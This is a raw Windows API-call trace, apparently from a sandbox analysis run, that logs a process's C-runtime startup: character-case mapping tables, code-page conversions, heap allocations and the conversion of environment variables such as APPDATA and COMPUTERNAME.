\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0049.166] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0049.166] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e9f8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0049.166] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18f1d4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x89jþ\x10ô\x18", lpUsedDefaultChar=0x0) returned 256 [0049.166] GetLastError () returned 0x0 [0049.166] SetLastError (dwErrCode=0x0) [0049.166] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2d4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0049.166] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2d4, cbMultiByte=256, lpWideCharStr=0x18ec28, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0049.166] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0049.166] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x18ea18, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0049.167] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18f0d4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x89jþ\x10ô\x18", lpUsedDefaultChar=0x0) returned 256 [0049.172] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0049.172] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x0 [0049.205] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x660c88) returned 0x80 [0049.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0049.217] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x1f) returned 0x65ec28 [0049.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x65ec28, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0049.228] GetLastError () returned 0x0 [0049.228] SetLastError (dwErrCode=0x0) [0049.228] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x4) returned 0x661380 [0049.228] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x661380) returned 0x4 [0049.228] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x661380, Size=0x8) returned 0x661380 [0049.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0049.229] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x36) returned 0x661390 [0049.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x661390, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0049.229] GetLastError () returned 0x0 [0049.229] SetLastError (dwErrCode=0x0) [0049.229] GetLastError () returned 0x0 [0049.229] SetLastError (dwErrCode=0x0) [0049.229] GetLastError () returned 0x0 [0049.229] SetLastError (dwErrCode=0x0) [0049.235] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x661380) returned 0x8 [0049.235] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x661380, Size=0xc) returned 0x6613d0 [0049.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0049.235] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x37) returned 0x6613e8 [0049.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x6613e8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0049.235] GetLastError () returned 0x0 [0049.235] SetLastError (dwErrCode=0x0) [0049.235] GetLastError () returned 0x0 [0049.235] SetLastError (dwErrCode=0x0) [0049.235] GetLastError () returned 0x0 [0049.235] SetLastError (dwErrCode=0x0) [0049.235] GetLastError () returned 0x0 [0049.235] SetLastError (dwErrCode=0x0) [0049.235] GetLastError () returned 0x0 [0049.235] SetLastError (dwErrCode=0x0) [0049.235] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6613d0) returned 0xc [0049.235] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6613d0, Size=0x10) returned 0x6613d0 [0049.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0049.236] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x3c) returned 0x655488 [0049.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x655488, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0049.236] GetLastError () returned 0x0 [0049.236] SetLastError (dwErrCode=0x0) [0049.236] GetLastError () returned 0x0 [0049.236] SetLastError (dwErrCode=0x0) [0049.236] GetLastError () returned 0x0 [0049.236] SetLastError (dwErrCode=0x0) [0049.236] GetLastError () returned 0x0 [0049.236] SetLastError (dwErrCode=0x0) [0049.236] GetLastError () returned 0x0 [0049.236] SetLastError (dwErrCode=0x0) [0049.236] GetLastError () returned 0x0 [0049.236] SetLastError (dwErrCode=0x0) [0049.236] GetLastError () returned 0x0 [0049.236] SetLastError (dwErrCode=0x0) [0049.236] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6613d0) returned 0x10 [0049.237] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6613d0, Size=0x14) returned 0x661428 [0049.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0049.237] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x31) returned 0x661448 [0049.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x661448, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0049.237] GetLastError () returned 0x0 [0049.237] SetLastError (dwErrCode=0x0) [0049.237] GetLastError () returned 0x0 [0049.237] SetLastError (dwErrCode=0x0) [0049.237] GetLastError () returned 0x0 [0049.237] SetLastError (dwErrCode=0x0) [0049.237] GetLastError () returned 0x0 [0049.237] SetLastError (dwErrCode=0x0) [0049.237] GetLastError () returned 0x0 [0049.237] SetLastError (dwErrCode=0x0) [0049.237] GetLastError () returned 0x0 [0049.237] SetLastError (dwErrCode=0x0) [0049.237] GetLastError () returned 0x0 [0049.238] SetLastError (dwErrCode=0x0) [0049.238] GetLastError () returned 0x0 [0049.238] SetLastError (dwErrCode=0x0) [0049.238] GetLastError () returned 0x0 [0049.238] SetLastError (dwErrCode=0x0) [0049.238] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x661428) returned 0x14 [0049.238] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x661428, Size=0x18) returned 0x661428 [0049.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0049.238] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x17) returned 0x661488 [0049.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x661488, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0049.238] GetLastError () returned 0x0 [0049.238] SetLastError (dwErrCode=0x0) [0049.239] GetLastError () returned 0x0 [0049.239] SetLastError (dwErrCode=0x0) [0049.239] GetLastError () returned 0x0 [0049.239] SetLastError (dwErrCode=0x0) [0049.239] GetLastError () returned 0x0 [0049.239] SetLastError (dwErrCode=0x0) [0049.239] GetLastError () returned 0x0 [0049.239] SetLastError (dwErrCode=0x0) [0049.239] GetLastError () returned 0x0 [0049.239] SetLastError (dwErrCode=0x0) [0049.239] GetLastError () returned 0x0 [0049.239] SetLastError (dwErrCode=0x0) [0049.239] GetLastError () returned 0x0 [0049.239] SetLastError (dwErrCode=0x0) [0049.239] GetLastError () returned 0x0 [0049.239] SetLastError (dwErrCode=0x0) [0049.239] GetLastError () returned 0x0 [0049.239] SetLastError (dwErrCode=0x0) [0049.239] GetLastError () returned 0x0 [0049.240] SetLastError (dwErrCode=0x0) [0049.240] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x661428) returned 0x18 [0049.240] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x661428, Size=0x1c) returned 0x6614a8 [0049.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0049.240] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x24) returned 0x65a730 [0049.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x65a730, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0049.240] GetLastError () returned 0x0 [0049.240] SetLastError (dwErrCode=0x0) [0049.240] GetLastError () returned 0x0 [0049.240] SetLastError (dwErrCode=0x0) [0049.240] GetLastError () returned 0x0 [0049.240] SetLastError (dwErrCode=0x0) [0049.240] GetLastError () returned 0x0 [0049.240] SetLastError (dwErrCode=0x0) [0049.240] GetLastError () returned 0x0 [0049.240] SetLastError (dwErrCode=0x0) [0049.240] GetLastError () returned 0x0 [0049.240] SetLastError (dwErrCode=0x0) [0049.240] GetLastError () returned 0x0 [0049.240] SetLastError (dwErrCode=0x0) [0049.240] GetLastError () returned 0x0 [0049.240] SetLastError (dwErrCode=0x0) [0049.240] GetLastError () returned 0x0 [0049.241] SetLastError (dwErrCode=0x0) [0049.241] GetLastError () returned 0x0 [0049.241] SetLastError (dwErrCode=0x0) [0049.241] GetLastError () returned 0x0 [0049.241] SetLastError (dwErrCode=0x0) [0049.241] GetLastError () returned 0x0 [0049.241] SetLastError (dwErrCode=0x0) [0049.241] GetLastError () returned 0x0 [0049.241] SetLastError (dwErrCode=0x0) [0049.241] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6614a8) returned 0x1c [0049.241] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6614a8, Size=0x20) returned 0x6614a8 [0049.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0049.241] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x14) returned 0x661428 [0049.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x661428, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0049.241] GetLastError () returned 0x0 [0049.241] SetLastError (dwErrCode=0x0) [0049.241] GetLastError () returned 0x0 [0049.242] SetLastError (dwErrCode=0x0) [0049.242] GetLastError () returned 0x0 [0049.242] SetLastError (dwErrCode=0x0) [0049.242] GetLastError () returned 0x0 [0049.242] SetLastError (dwErrCode=0x0) [0049.242] GetLastError () returned 0x0 [0049.242] SetLastError (dwErrCode=0x0) [0049.242] GetLastError () returned 0x0 [0049.242] SetLastError (dwErrCode=0x0) [0049.242] GetLastError () returned 0x0 [0049.242] SetLastError (dwErrCode=0x0) [0049.242] GetLastError () returned 0x0 [0049.242] SetLastError (dwErrCode=0x0) [0049.242] GetLastError () returned 0x0 [0049.242] SetLastError (dwErrCode=0x0) [0049.242] GetLastError () returned 0x0 [0049.243] SetLastError (dwErrCode=0x0) [0049.243] GetLastError () returned 0x0 [0049.243] SetLastError (dwErrCode=0x0) [0049.243] GetLastError () returned 0x0 [0049.243] SetLastError (dwErrCode=0x0) [0049.243] GetLastError () returned 0x0 [0049.243] SetLastError (dwErrCode=0x0) [0049.243] GetLastError () returned 0x0 [0049.243] SetLastError (dwErrCode=0x0) [0049.243] GetLastError () returned 0x0 [0049.243] SetLastError (dwErrCode=0x0) [0049.243] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6614a8) returned 0x20 [0049.243] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6614a8, Size=0x24) returned 0x6614a8 [0049.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0049.243] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xd) returned 0x65e440 [0049.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x65e440, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0049.243] GetLastError () returned 0x0 [0049.243] SetLastError (dwErrCode=0x0) [0049.243] GetLastError () returned 0x0 [0049.244] SetLastError (dwErrCode=0x0) 